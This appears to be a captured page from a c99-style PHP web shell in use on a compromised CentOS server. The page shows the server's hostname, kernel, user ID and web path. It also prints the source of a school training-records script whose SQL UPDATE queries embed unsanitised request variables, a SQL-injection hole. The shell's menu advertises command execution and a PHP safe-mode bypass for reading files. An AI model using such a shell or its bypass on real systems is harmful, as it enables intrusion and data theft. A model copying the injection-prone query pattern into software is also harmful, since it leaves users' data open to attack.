Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/teacher/ drwxr-xr-x |
Viewing file: EditFormA.php (2.16 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | <?php include("../include/FunctionDB.php"); include("../include/Function.php"); ConnectDB(); $Date = $_POST[mYear]."-".$_POST[mMonth]."-".$_POST[mDate]; $Date_start = $_POST[mYear1]."-".$_POST[mMonth1]."-".$_POST[mDate1]; $Date_finish = $_POST[mYear2]."-".$_POST[mMonth2]."-".$_POST[mDate2]; $strSQL="UPDATE training_tb SET Teacher_code='$Teacher_code',Training_name='$Training_name',Training_type='$Training_type',Year_std='$Year_std',Date_start='$Date_start',Date_finish='$Date_finish' Where Training_code='$Training_code' "; $result = mysql_query($strSQL) or die("Update Error $strSQL $result".mysql_error()); $strSQL1 = " UPDATE FormAoffice SET Teacher_code='$Teacher_code',code='$code',ProjectId='$ProjectId',No_in='$No_in',Detail='$Detail',Date='$Date',Date_start='$Date_start',Date_finish='$Date_finish',Training_name='$Training_name',Training_type='$Training_type',Day='$Day',Year_std='$Year_std',TeacherId='$TeacherId',Flag1='$Flag1',Flag2='$Flag2' Where Training_code='$Training_code' "; $result1 = mysql_query($strSQL1) or die("Update Error $strSQL $result1".mysql_error()); $strSQL1 = " UPDATE project_tb SET ProjectId='$ProjectId',Training_name='$Training_name',Orderlist='$Orderlist',Project_plan='$Project_plan',MoneyS_C='$MoneyS_C',MoneyId='$MoneyId',Date='$Date',Budget_use='$Budget_use' Where Training_code='$Training_code' and Teacher_code='$Teacher_code' "; $result1 = mysql_query($strSQL1) or die("Update Error $strSQL $result1".mysql_error()); echo "<center>"; echo"<font face=\"Ms san serif\"size=\"4\"><font color=\"0000FF\">$Fname</font>Edit Complete </font></center>"; echo"<meta http-equiv=\"refresh\" content=\"1;URL=FormAList.php?Teacher_code=$Teacher_code\">"; CloseDB(); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0154 ]-- |